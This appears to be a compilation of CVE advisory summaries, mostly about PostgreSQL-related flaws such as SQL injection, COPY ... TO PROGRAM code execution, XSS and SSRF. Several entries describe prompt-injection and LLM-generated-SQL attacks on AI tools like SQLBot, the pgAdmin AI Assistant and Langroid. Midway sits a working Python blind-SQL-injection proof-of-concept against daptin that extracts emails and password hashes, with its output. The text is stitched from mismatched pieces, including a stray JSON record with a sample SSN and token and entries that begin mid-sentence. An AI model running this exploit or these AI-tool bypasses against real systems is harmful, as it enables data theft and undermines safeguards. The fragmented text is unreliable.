SQL injection in PostgreSQL's pg_createsubscriber utility escalates privileges from pg_create_subscription to superuser, enabling arbitrary SQL execution. Affects PostgreSQL versions 17.0-17.9 and 18.0-18.3; exploitation requires high-privilege access (pg_create_subscription rights) but occurs remotely without additional complexity. Attack triggers when pg_createsubscriber next executes. Fixed in PostgreSQL 18.4 and 17.10. No CISA KEV listing or public exploit identified at time of analysis, but the technical simplicity (AC:L) and privilege escalation nature present moderate risk for multi-tenant or hosted PostgreSQL environments where subscription management permissions are delegated.
Symlink following vulnerabilities in PostgreSQL pg_basebackup and pg_rewind enable database superusers to overwrite arbitrary files on the destination server's filesystem, leading to local OS account takeover. Exploitation requires a malicious origin database superuser convincing an administrator to run these backup/replication tools (UI:R in CVSS), with practical impact limited to scenarios where database files are transferred between systems or snapshotted before server restart. No public exploit identified at time of analysis. CVSS 8.8 reflects theoretical severity, but real-world risk depends on specific operational workflows involving backup file transfers across trust boundaries.
Format string vulnerability in PostgreSQL timeofday() function allows authenticated remote attackers to read arbitrary server memory by supplying crafted timezone values. Affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. The vulnerability enables information disclosure of sensitive data stored in process memory without code execution or data modification capabilities.
Remote code execution in PostgreSQL (versions 14.x-18.x) allows authenticated database users to execute arbitrary code as the database operating system user via integer wraparound vulnerabilities in multiple server features. By passing gigabyte-scale inputs to affected database functions, attackers trigger allocation undersizing that leads to out-of-bounds writes. No active exploitation confirmed (not in CISA KEV), but CVSS 8.8 with network vector and low complexity indicates high exploitability once technical details become public. EPSS data not available at time of analysis.
Missing authorization in PostgreSQL CREATE TYPE allows authenticated users to hijack search_path resolution and force other database users to execute arbitrary SQL functions chosen by the attacker. An authenticated attacker can create a malicious user-defined type in a schema that appears earlier in a victim's search_path than legitimate extension or system types, causing the victim's queries to execute attacker-controlled functions instead of intended ones. This affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. While CVSS 5.4 is moderate, the attack requires authenticated database access and carries real risk in multi-tenant or shared PostgreSQL environments where privilege escalation or lateral movement is the goal.
SQL injection in SOGo versions prior to 5.12.7 allows authenticated users to inject arbitrary SQL when changing their password, provided the deployment uses PostgreSQL or MariaDB as the user backend and stores cleartext passwords. The flaw resides in the changePasswordForLogin routine where the new password value is interpolated directly into an UPDATE statement (c_password = '%@'). No public exploit identified at time of analysis, EPSS is very low (0.03%), and SSVC marks exploitation as 'none' - but the patched upstream code (PR #379, fixed in 5.12.7) confirms the vulnerability.
SQL injection in Alinto SOGo versions prior to 5.12.7 allows authenticated remote attackers to manipulate database queries when the groupware is deployed against a PostgreSQL backend. The flaw stems from improper quoting in the SQLSource authentication and contact-lookup paths, which an attacker can leverage to read or modify data with high confidentiality and integrity impact. No public exploit identified at time of analysis and EPSS is very low (0.03%), but a vendor patch and upstream code fix are available.
SQL injection in the Elixir postgrex library allows local attackers with control over PostgreSQL LISTEN/UNLISTEN channel names to execute arbitrary SQL commands including DDL and DML operations. The Postgrex.Notifications module (versions 0.16.0 through 0.22.1) fails to escape double-quote characters in channel arguments, enabling attackers to break out of quoted identifiers and chain multi-statement payloads such as DROP TABLE commands. Vendor patch available in version 0.22.2 per GitHub advisory GHSA-r73h-97w8-m54h. No public exploit code or CISA KEV listing identified at time of analysis, though the technical details and patch diff are publicly disclosed.
Prior to 2025-11-03, well-intended users of Terraform or REST API for Google Cloud AlloyDB for PostgreSQL could have created clusters with an insecure default password which could have been exploited by a remote attacker to gain full administrative access to the database. Exploitation required network access to the AlloyDB cluster and was limited to Terraform or the REST API, as other clients blocked it.
{ "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } }
Privilege escalation and OS command execution in CloudNativePG (CNPG) versions prior to 1.28.3 and 1.29.1 allow low-privileged PostgreSQL roles to gain superuser access and execute arbitrary commands inside the primary database pod. The metrics exporter connects as the postgres superuser and only demotes via SET ROLE, leaving session_user as superuser; an attacker who owns a database (including the default `app` role) can shadow unqualified identifiers like `current_database()` referenced in the stock `default-monitoring.yaml`, triggering the chain on the next scrape (≤30s). No public exploit identified at time of analysis, but the vulnerability is highly impactful (CVSS 9.4) and affects default deployments without custom metrics.
SQL injection in pgAdmin 4 Maintenance Tool allows authenticated users with tools_maintenance permission to execute arbitrary SQL and escalate to operating-system command execution on PostgreSQL database hosts. Four JSON fields (buffer_usage_limit, vacuum_parallel, vacuum_index_cleanup, reindex_tablespace) are concatenated unsafely into VACUUM/ANALYZE/REINDEX commands passed to psql. Attackers can break out of option syntax, inject SQL statements, and leverage PostgreSQL's COPY ... TO PROGRAM to achieve OS-level code execution. Fixed in version 9.15 via server-side allow-listing and proper input sanitization using qtIdent filter. EPSS data not available; no public exploit identified at time of analysis.
Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.
SQL injection in MikroORM versions ≤7.0.13 (v7) and ≤6.6.13 (v6) allows authenticated attackers to execute arbitrary SQL queries by injecting malicious characters into schema names, JSON property filters, or query builder keys. The vulnerability stems from improper escaping of dialect-specific quote characters in identifier-quoting and JSON-path functions. Multi-tenant applications are at heightened risk of cross-tenant data leakage. Vendor-released patches are available: upgrade to 7.0.14 (v7) or 6.6.14 (v6). No public exploit identified at time of analysis, though the vulnerability was discovered during internal security review by the project maintainer.
SQL injection vulnerability in pgx (Go PostgreSQL driver) prior to version 5.9.2 allows authenticated attackers to manipulate queries when the non-default simple protocol is used in conjunction with dollar-quoted string literals containing attacker-controlled placeholder-like text. The vulnerability requires specific configuration (simple protocol mode enabled) and precise SQL structure (dollar-quoted strings with embedded placeholder syntax), making exploitation unlikely in typical deployments but possible in applications explicitly using QueryExecModeSimpleProtocol.
SQL injection in PraisonAI's multi-backend conversation storage system allows authenticated attackers to execute arbitrary SQL commands. The incomplete fix for CVE-2026-40315 validated input only in SQLiteConversationStore, leaving nine other database backends (MySQL, PostgreSQL, Turso, SingleStore, Supabase, SurrealDB, and their async variants) vulnerable to f-string SQL injection via unvalidated table_prefix and schema parameters. 52 injection points exist across the codebase. Exploitable in multi-tenant deployments or API-driven configurations where table_prefix is derived from external input. Patches released in praisonai 4.6.9 and praisonaiagents 1.6.9 address all affected backends. EPSS and KEV data unavailable; no public POC confirmed at time of analysis.
{"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.
SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.
SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.
Prompt injection in SQLBot 1.7.0 and earlier allows authenticated attackers to execute arbitrary SQL statements through the Text2SQL chat interface, escalating to remote code execution when connected to PostgreSQL databases via COPY FROM PROGRAM. The vulnerability stems from unsanitized user input being directly concatenated into LLM prompts, with resulting SQL executed without validation. CVSS 9.4 (Critical) reflects network-based attack with low complexity requiring only low-privilege authentication. SSVC framework confirms proof-of-concept availability and total technical impact, though exploitation is not fully automatable. Vendor-released patch 1.7.1 addresses the issue.
Authorization bypass in CKAN's datastore_search_sql function allows unauthenticated attackers to access private DataStore resources and extract PostgreSQL system information. CKAN versions prior to 2.10.10 and 2.11.0-2.11.4 are affected. The vulnerability exists in a feature that is disabled by default but can be enabled via configuration, limiting baseline exposure but creating significant risk for deployments that enable SQL search functionality.
A vulnerability in `datastore_search_sql` allowed attackers to inject SQL in order to gain access to private resources and PostgreSQL system information. The issue has been patched in CKAN 2.10.10 and CKAN 2.11.5 Disable the DataStore SQL search (`ckan.datastore.sqlsearch.enabled = false`). Note that the SQL search is disabled by default. As stated in the [documentation](https://docs.ckan.org/en/2.11/maintaining/configuration.html#ckan-datastore-sqlsearch-enabled), this action function has protections that offer some safety but are not designed to prevent all types of abuse. Depending on the sensitivity of private data in a project's DataStore and the likelihood of abuse of a consuming site, a developer may choose to disable this action function or restrict its use with a [`IAuthFunctions`](https://docs.ckan.org/en/2.11/extensions/plugin-interfaces.html#ckan.plugins.interfaces.IAuthFunctions) plugin. * Reported by Arvin Shivram of Brutecat Security
pgjdbc is an open source postgresql JDBC Driver. From version 42.2.0 to before version 42.7.11, pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication. A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count. With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail. A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools. In affected versions, loginTimeout did not fully mitigate this problem. When loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation. This issue has been patched in version 42.7.11.
Remote code execution in H2O-3 versions 3.46.0.9 and earlier allows unauthenticated attackers to execute arbitrary code via the /99/ImportSQLTable REST API by abusing PostgreSQL JDBC driver parameters that bypass an incomplete MySQL-only parameter blacklist. No active exploitation is recorded in CISA KEV and EPSS is low (0.19%), but a vendor patch is available and SSVC marks exploitation status as POC, indicating proof-of-concept-grade attacker capability against a network-reachable endpoint.
SQL injection in listmonk's subscriber export endpoint prior to version 6.2.0 allows a highly-privileged authenticated user to read arbitrary PostgreSQL database tables - including users and settings - and execute data-modifying CTEs. The GET /api/subscribers/export endpoint passed a user-controlled query parameter directly into QuerySubscribersForExport in internal/core/subscribers.go without invoking the validateQueryTables guard that the sibling GET /api/subscribers endpoint correctly applies, creating a bypass of the allowlist-based table restriction. Exploitation requires possession of both the subscribers:sql_query and subscribers:get_all permissions; no public exploit code has been identified at time of analysis.
Command injection in NocoBase's @nocobase/plugin-backups prior to v2.1.19 allows an authenticated backup-management user to execute arbitrary OS commands as the NocoBase server process by restoring a crafted backup archive. The database.schema field from a backup's _metadata.json is interpolated directly into a shell command string passed to Node.js child_process.exec(), a classic CWE-78 pattern that bypasses any sanitization at the shell level. No active exploitation confirmed (not in CISA KEV) and no public exploit identified at time of analysis, but the commit diff confirms the mechanism is straightforward and the fix is available in v2.1.19.
SQL injection in NocoBase's @nocobase/plugin-notification-in-app-message (before 2.0.61) lets any signed-up authenticated user reach GET /api/myInAppChannels:list and inject into the filter[latestMsgReceiveTimestamp][$lt] parameter, which is concatenated into a Sequelize.literal() template with no escaping or parameter binding. Because PostgreSQL permits stacked statements through this sink, an attacker can run arbitrary SQL and escalate to operating-system command execution via COPY ... TO PROGRAM. No public exploit identified at time of analysis and the flaw is not in CISA KEV, but the code fix and regression tests are public in the vendor commit, and the vendor rates it CVSS 10.0.
PostgreSQL password hash disclosure in NocoBase 2.0.59 and earlier allows an authenticated administrator to extract pg_shadow credential hashes and database metadata by submitting raw SQL queries that reference system catalog tables omitted from the checkSQL() keyword blacklist. The SQL Collection plugin's blocklist-based validation failed to restrict pg_shadow, pg_roles, pg_stat_activity, and information_schema, and the commit diff confirms the bypass also worked via subquery wrapping (e.g., SELECT * FROM (SELECT usename, passwd FROM pg_shadow) AS passwords). No public exploit identified at time of analysis, and this CVE is not listed in CISA KEV; a vendor-released patch is available in v2.1.0-alpha.46.
SQL injection in DataEase before 2.10.23 lets an authenticated low-privilege user compromise the backend datasource by abusing the datasource connection-status check, where io.dataease.datasource.provider.CalciteProvider#checkStatus concatenates the user-controlled configuration.getSchema() value into getTablesSql and runs it via executeQuery. Because the schema/owner string is embedded directly into metadata queries for DB2, SQL Server, PostgreSQL, Oracle and other datasources, an attacker who can create or edit a datasource can inject arbitrary SQL and read or alter data on the connected database. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the root cause is confirmed by the vendor commit that replaces string concatenation with parameterized PreparedStatements.
Blind SQL injection in decidim-admin's organization user search endpoint allows authenticated organization administrators to execute arbitrary PostgreSQL expressions inside an ORDER BY clause via the `term` query parameter. The flaw spans decidim-admin versions prior to 0.30.9, 0.31.5, and 0.32.0, and is exploitable using time-based payloads such as `pg_sleep` that return HTTP 200 while leaking data through measurable response-time deltas. No public exploit tool is identified at time of analysis and the vulnerability is not in CISA KEV, but the advisory provides working reproduction steps with a concrete payload, confirming practical exploitability.
Unauthenticated API key metadata disclosure in Capgo before 12.128.2 stems from the find_apikey_by_value PostgreSQL function being marked SECURITY DEFINER and granted to the anon role, allowing anyone to call it through the PostgREST endpoint /rest/v1/rpc/find_apikey_by_value. When supplied a valid key value, an attacker retrieves sensitive metadata about that key - user_id, mode, organization scoping, and expiration details - bypassing normal row-level security. Reported by VulnCheck with CVSS 4.0 8.7 (High); no public exploit identified at time of analysis and it is not listed in CISA KEV.
SQL injection in the Coturn TURN/STUN server's HTTPS admin panel (versions prior to 4.12.0) allows an authenticated administrator to inject arbitrary SQL via the du, ds, and dip query parameters of the delete-user, delete-secret, and delete-IP operations, yielding full backend database control and, on PostgreSQL deployments, OS-level command execution through COPY TO PROGRAM. The admin panel's parameters are interpolated into queries with snprintf while bypassing the is_secure_string filter that guards the STUN protocol path. No public exploit is identified at time of analysis and the flaw is not listed in CISA KEV; fixed in Coturn 4.12.0.
SQL injection in Postgrex.Notifications' reconnect replay path allows an attacker who can supply untrusted input as a PostgreSQL LISTEN channel name to corrupt the shared notification connection, silently dropping all channel subscriptions and causing persistent denial of service of the notification subsystem. Affected versions are postgrex 0.16.0 through 0.22.2 in the Elixir ecosystem. No arbitrary SQL execution is possible due to double-quote escaping, and no public exploit or CISA KEV listing exists; the CVSS 4.0 base score of 2.1 reflects the constrained, precondition-heavy impact.
Connection string injection in KEDA's PostgreSQL scaler allows low-privileged tenants to inject arbitrary libpq connection parameters by embedding tab, newline, or other non-space whitespace characters into ScaledObject or TriggerAuthentication configuration fields. The `escapePostgreConnectionParameter` function in `pkg/scalers/postgresql_scaler.go` only detects literal spaces before quoting values, leaving all other libpq token delimiters unescaped; successful exploitation forces TLS downgrade (sslmode=disable) or redirects database connections to attacker-controlled hosts to steal operator-supplied credentials. A working proof-of-concept YAML payload is included in GitHub advisory GHSA-6w3m-4hhp-775q; no CISA KEV listing was present at time of analysis.
Path traversal leading to remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.474 allows an authenticated user to abuse insufficient filename sanitization in the PostgreSQL initialization-script generator (generate_init_scripts() in app/Actions/Database/StartPostgresql.php) to write files outside the intended directory and execute commands during database init. Any user with sufficient privileges to provision a PostgreSQL resource can escalate to code execution on the Coolify host. No public exploit identified at time of analysis, though the fix commit and security advisory publicly disclose the vulnerable code path.
Command injection in Coolify self-hosted PaaS versions prior to 4.0.0-beta.474 allows an authenticated user to run arbitrary OS commands inside the PostgreSQL database container by supplying malicious postgres_user or postgres_db values that are interpolated into shell-form healthcheck commands (CWE-78). Because the CVSS vector is PR:L/UI:N with full high impact to confidentiality, integrity, and availability, any user able to create or configure a database can achieve container-level code execution. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Server-side file disclosure in Langroid's SQLChatAgent (Python, pip package `langroid` <= 0.65.0) lets an attacker who can influence the agent's LLM-generated SQL bypass the `_validate_query` safety guard and execute PostgreSQL file-read functions such as `pg_read_file`. The default `allow_dangerous_operations=False` blocklist relies on a raw-text regex requiring `pg_...` names to be immediately followed by `(`, which is evaded by quoted identifiers, inline comments, or schema qualification while still parsing as a permitted SELECT. This is a bypass of the earlier CVE-2026-25879 / GHSA-pmch-g965-grmr regex fix; a working reproduction harness is published in the GHSA advisory, though there is no public exploit identified as being used in active attacks and no CISA KEV listing.
Channel-binding downgrade in the pgjdbc PostgreSQL JDBC Driver (releases 42.7.4 through 42.7.11) lets an active man-in-the-middle silently strip SCRAM-SHA-256-PLUS channel binding down to plain SCRAM-SHA-256 even when the client explicitly set channelBinding=require, defeating the exact protection that setting promises. The flaw stems from the bundled com.ongres.scram:scram-client returning an empty binding for certificates whose signature algorithm lacks a tls-server-end-point hash, combined with pgJDBC's ScramAuthenticator failing to reject that empty binding. No public exploit identified at time of analysis and it is not listed in CISA KEV; it is fixed in 42.7.12.
Source-code disclosure in the Algernon web/application server (Go, xyproto/algernon, tested at v1.17.8) lets an unauthenticated remote client retrieve the raw source of any public-path server-side script on Windows hosts by appending an NTFS-equivalent suffix (::$DATA, a trailing dot, or a trailing space) to the URL. Because filepath.Ext() does an exact suffix match, these forms are not recognized as .lua/.tl/.po2/.amber/.frm and fall through to the raw-file branch, while NTFS canonicalizes the name back to the real script, exposing embedded database credentials and the SetCookieSecret value used to forge session cookies. Publicly available exploit code exists (full PoC in the GitHub advisory); no public exploit identified as actively exploited and this is not in CISA KEV.
Arbitrary file read in Langroid's SQLChatAgent (<= 0.63.0) lets an attacker who can influence the LLM-generated SQL exfiltrate files from the PostgreSQL host even under the strict default config (allow_dangerous_operations=False, allowed_statement_types=['SELECT']). The _validate_query blocklist enumerates dangerous functions by exact name and misses the pg_read_file/pg_stat_file/pg_ls_*/pg_current_logfile family (plus MSSQL OPENDATASOURCE and keyword-less SQLite ATTACH), so these SELECT-shaped payloads pass both the statement-type allowlist and the regex blocklist and reach the live SQLAlchemy engine. Publicly available exploit code exists (a working PoC ships in the GHSA advisory); no public exploit identified as actively exploited and this is not in CISA KEV.
PostgreSQL Anonymizer's anon.hash() function exposes its internal salt to masked database users through an offline brute-force attack, undermining the core pseudonymization guarantee of the extension. Masked roles - the primary consumer of this extension - can call anon.hash() with arbitrary seed inputs and accumulate (seed, hash_output) pairs to deduce the salt offline, after which all pseudonymized values in the database become reversible. No active exploitation or public proof-of-concept has been identified; a vendor-confirmed fix is available in version 3.1.2.
SQL injection in Raytha CMS 1.5.2 lets a remote, unauthenticated attacker inject arbitrary SQL through the OData filter parsing pipeline, yielding full compromise of the backing PostgreSQL database and extraction of stored credentials. The CVSS 4.0 base score is 9.3 (critical) with a fully network-reachable, no-privilege, no-interaction vector. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the unauthenticated network-facing nature makes it a high-priority patch candidate.
Offline administrator password recovery in Kestra OSS (versions prior to 1.3.24) stems from its BasicAuth component storing the admin credential as a fast SHA-512 hash. An attacker who already holds read access to the backing PostgreSQL database can extract that hash and crack it offline at high speed, then log in as administrator; in Kubernetes deployments this further exposes the cluster ServiceAccount token and all K8s Secrets, enabling vertical privilege escalation. No public exploit identified at time of analysis and not on CISA KEV; EPSS data was not provided.
SQL injection in n8n's MySQL, PostgreSQL, and Microsoft SQL database integration nodes (all versions before 2.4.0) allows authenticated users with workflow creation permissions to execute arbitrary SQL commands against connected databases by supplying crafted identifier values - table or column names - in node configuration parameters. The nodes failed to escape SQL identifiers when constructing queries, bypassing the safety guarantees users expected from parameterized inputs and enabling injection that directly impacts downstream database confidentiality and integrity. Reported by the NATO Cyber Security Centre; vendor-released patch is confirmed in n8n 2.4.0, with no public exploit code or CISA KEV listing identified at time of analysis.
{$exists:true}`) that override the builder's intended filter, returning or altering every document in a MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or JSON-body REST collection. A detailed working POC is published in the advisory; the issue is not in CISA KEV and EPSS is low (0.43%, 34th percentile), so this is publicly demonstrated but not yet confirmed as actively exploited.
Remote code execution in Gogs self-hosted Git service before 0.14.3 allows unauthenticated attackers (where self-registration is enabled) to abuse unsanitized organization names containing '../' sequences to write Git repository files outside the intended storage root, then overwrite a repository's hooks/update script and trigger arbitrary command execution as the git user. The flaw carries a CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C) rating, and a fully working public proof-of-concept is published alongside the GHSA advisory, though no CISA KEV listing or EPSS data is provided in the input.
Unauthenticated denial of service in Cap-go capgo (capgo-backend) before 12.128.12 allows remote attackers to exhaust PostgreSQL resources by sending unfiltered queries to the public.audit_logs PostgREST endpoint using the public anon key. Because the query planner runs expensive logic before Row-Level Security rejection, repeated requests trigger statement timeouts (error 57014) and cascade into HTTP 500 failures on unrelated endpoints such as /orgs. No public exploit identified at time of analysis, though the technique is fully described in the GHSA advisory.
Arbitrary file read in Budibase self-hosted server (@budibase/server <= 3.39.0) allows an authenticated workspace builder to exfiltrate any file readable by the server process by uploading a crafted PWA zip containing a symlink entry. Because the default `budibase/budibase:latest` Docker image runs Node as root, attackers can retrieve `/data/.env` (JWT_SECRET, INTERNAL_API_KEY, MinIO/Redis/CouchDB credentials, DATABASE_URL) and even `/etc/shadow`, enabling JWT forgery and full global-admin takeover. Publicly available exploit code exists - a complete working PoC is published in the GHSA advisory - though there is no public exploit identified at time of analysis beyond that disclosure write-up.
Unauthenticated access to Capgo's /replication HTTP endpoint exposes internal PostgreSQL replication telemetry to any remote attacker, affecting all versions prior to 12.128.2. Attackers can retrieve replication slot names, WAL LSN positions (confirmed_flush_lsn, restart_lsn), and database error messages without supplying any credentials, enabling database infrastructure reconnaissance. No public exploit code or CISA KEV listing exists at time of analysis, but the zero-complexity unauthenticated attack vector makes opportunistic scanning against internet-exposed Capgo deployments trivially feasible.
Improper input validation in ProxySQL versions 3.0.0 through 3.0.8 lets MCP callers bypass the GenAI `run_sql_readonly` tool's read-only contract by submitting multi-statement payloads such as `SELECT 1; RENAME TABLE x TO y`, which execute in full because the backend connection enables `CLIENT_MULTI_STATEMENTS`. An attacker reaching the `/mcp/query` endpoint can perform writes and administrative SQL up to the privileges of the configured MCP backend account. No public exploit identified at time of analysis, though the upstream advisory documents a successful live test against the endpoint.
Source-address spoofing in ProxySQL 2.0.0 through 3.0.8 lets any TCP peer that can reach the MySQL frontend port forge the client IP seen by the query-rule engine, bypassing routing and ACL controls. The flaw stems from incorrect parsing of the HAProxy PROXY protocol v1 `UNKNOWN` token, whose address fields the specification requires receivers to ignore. No public exploit identified at time of analysis, but the vendor advisory describes the attack mechanics in detail and version 3.0.9 ships the fix.
Pre-authentication heap memory corruption in ProxySQL 2.0.18 through 3.0.8 allows remote unauthenticated attackers to corrupt heap memory by sending a crafted first packet declaring an oversized length, which is passed directly to recv() into a fixed 32 KB input queue on both MySQL and PostgreSQL protocol listeners. The flaw carries a CVSS 9.8 rating and is fixed in 3.0.9; no public exploit identified at time of analysis, but the trivial trigger condition and out-of-bounds write primitive create strong potential for weaponization.
Stored cross-site scripting in pgAdmin 4 versions 6.0 through 9.15 allows a malicious or attacker-influenced PostgreSQL server to inject arbitrary HTML into pgAdmin's interface via ErrorResponse messages and EXPLAIN plan fields rendered through html-react-parser. Because the injection executes inside pgAdmin's own DOM, an attacker can render convincing phishing dialogs or redirect the top-level tab via iframe srcdoc, bypassing standard X-Frame-Options and frame-ancestors protections. No public exploit identified at time of analysis, but the vendor has shipped a multi-layer fix in 9.16.
Remote SQL injection via prompt injection in pgAdmin 4 versions 9.13 through 9.15 allows attackers who can write content into database objects the AI Assistant inspects to bypass the read-only transaction wrapper and execute arbitrary SQL with the pgAdmin user's database role. When that role is a PostgreSQL superuser or holds pg_execute_server_program, the chain escalates to remote code execution on the database host via COPY ... TO PROGRAM. No public exploit identified at time of analysis; CVSS 4.0 base score is 9.4 (Critical) and an upstream fix is available.
{gid}/{sid}) permits a low-privilege authenticated user with an active PostgreSQL session to inject additional SQL statements by exploiting unsafe str.format() interpolation of the user-supplied 'value' field. Affected versions span pgAdmin 4 from 1.0 through 9.15; a patch was released in version 9.16. The injected SQL executes only under the authenticated user's existing database role, so no privilege boundary is crossed - the principal risk is bypass of application-layer controls that restrict the Query Tool while leaving the restore-point endpoint accessible. No public exploit or active exploitation confirmed at time of analysis.
SQL injection in pgAdmin 4 versions 1.0 through 9.15 allows an authenticated user with object-modification rights to inject SQL via the description field of Domain, Domain Constraint, Foreign Table, Language, Event Trigger, and View dialogs, where Jinja templates wrapped the value in single quotes instead of passing it through the qtLiteral escape filter. Sixteen template sites plus ten related pgstattuple/pgstatindex identifier sinks share the defect; injected SQL executes as the connected PostgreSQL role, and if that role can use COPY ... TO/FROM PROGRAM it pivots to OS command execution on the database host. No public exploit identified at time of analysis, and the vendor notes the bug does not cross a privilege boundary since the same user already has direct SQL access via the Query Tool.
Steeltoe.Configuration.Abstractions 4.0.0-4.1.0 permanently exposes TLS client private key material to world-readable temporary files on Linux when Cloud Foundry MySQL or PostgreSQL service bindings supply SSL credentials via VCAP_SERVICES. The Connectors library writes SSL certificate, private key, and CA files to Path.GetTempPath() using File.CreateText, which on Linux creates files at mode 0644 (owner read/write, group read, world read) with no cleanup mechanism, leaving key material readable by any co-located process for the container's lifetime. Vendor-released patch 4.2.0 resolves both the permission issue (restricting new temp files to mode 0600) and the missing cleanup via IDisposable; no public exploit has been identified at time of analysis.
SQL injection in LangChain4j's langchain4j-mariadb and langchain4j-pgvector embedding stores allows authenticated attackers who can influence metadata filter keys to execute arbitrary SQL via EmbeddingSearchRequest.filter(), enabling blind data exfiltration, denial of service through sleep functions, and deletion of arbitrary rows via removeAll(Filter). The flaw stems from string-concatenated filter keys (and MariaDB string values) being placed into SQL without escaping, and is particularly relevant where filter keys originate from LLM-generated output or untrusted user input. No public exploit identified at time of analysis, though the vendor advisory documents working proof-of-concept payloads such as pg_sleep(1) injection.
Server-side request forgery in Open WebUI versions 0.9.5 and earlier allows authenticated OAuth users to read arbitrary internal HTTP responses by abusing the `_process_picture_url` function in `backend/open_webui/utils/oauth.py`, which validates only the initial URL and then permits aiohttp's default 10-redirect follow chain to reach internal addresses. The decoded response body is stored in the attacker's `profile_image_url` and retrievable via `GET /api/v1/auths/`, yielding cloud metadata credentials and access to localhost-bound services. Publicly available exploit code exists (detailed sentinel-verified PoC supplied by the reporter); no public exploit identified at time of analysis in the form of weaponized tooling, and the CVE is not on the CISA KEV list.
SQL injection in n8n's legacy Postgres v1 and TimescaleDB workflow nodes allows an authenticated workflow editor to inject and execute arbitrary SQL against the connected database, operating under the privileges of the configured database account. Affected versions span all n8n npm releases below 2.25.7 and the 2.26.0-2.26.1 range, with the CVSS 9.9 score reflecting a confirmed scope change: the injection escapes the n8n application layer into the underlying database system (S:C), enabling full confidentiality, integrity, and availability compromise of database contents. No public exploit code and no CISA KEV listing have been identified at time of analysis, but the low-privilege requirement and network-accessible attack vector make this a critical priority for any deployment where workflow editing access is broadly granted.
